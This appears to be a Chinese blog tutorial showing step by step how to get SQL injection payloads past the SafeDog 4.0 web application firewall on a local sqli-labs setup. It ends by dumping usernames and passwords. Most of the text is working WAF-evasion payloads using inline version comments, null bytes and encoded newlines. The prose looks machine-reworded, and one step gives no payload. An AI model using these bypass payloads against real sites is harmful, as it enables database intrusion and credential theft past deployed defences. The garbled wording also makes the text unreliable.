实验环境为：

Sqli-lab

最新版平安狗4.0

Phpstudy apache+php+mysql

自己双手加一个脑子

下载装置最新版平安狗4.0，难度直接拉满！

SQL注入

1.注入判别：

字符型，输入payload 1’–+-,狗没有拦截，不至于连注释号都拦吧！

输入payload 1’ and ‘1’=’1，狗拦截，尝试打狗' and -1 =-1–+-，直接绕了

当然这里还有很多方法能够绕，比方这样1' | 1<2–+-

2.查询字段数：

尝试内联失败！然后1' order/*|–|*/–+aaaa%20%0a/*!10044by*//**/3–+- 胜利干懵狗子！

3.结合爆字段：

不时尝试！不时尝试！

终于配合%00让狗子看懵了！

-1'/*|–|*//*!10044UnIon*//*%00*/–+aaaa%20%0a/*!10044SeLECT*//**/11111,2222,3333–+-

4.尝试查询数据库版本信息：

但能查数据库的绝对途径

没有被拦截，一切猜想后面正则肯定是匹配一个函数，只需把函数的特征打乱，就能过！

尝试内联注释

Ok，悄悄松松绕！

如今就差查询数据库数据了
 

5.查表名：

http://127.0.0.1/sqli1/Less-1/?id=-1'/*|–|*//*!10044UnIon*//*%00*/–+a%20%0a/*!10044SeLECT*//**/11111,database/*!10044(*/),group_concat(table_name) from information_schema.tables where table_schema=database/*!10044(*/)–+-

6.查字段名：

留意这里把表名转换成16进制

http://127.0.0.1/sqli1/Less-1/?id=-1'/*|–|*//*!10044UnIon*//*%00*/–+a%20%0a/*!10044SeLECT*//**/11111,database/*!10044(*/),group_concat(column_name) from information_schema.columns where table_name=0x7573657273–+-

7.爆数据：

刚开端以为是对username,password这些关键词匹配，结果不是！

http://127.0.0.1/sqli1/Less-1/?id=-1'/*|–|*//*!10044UnIon*//*%00*/–+a%20%0a/*!10044SeLECT*//**/11111,username,password/*%00*/–+-aaabbbccc%0afrom users–+-

直接拿到数据

感谢您的来访，获取更多精彩文章请收藏本站。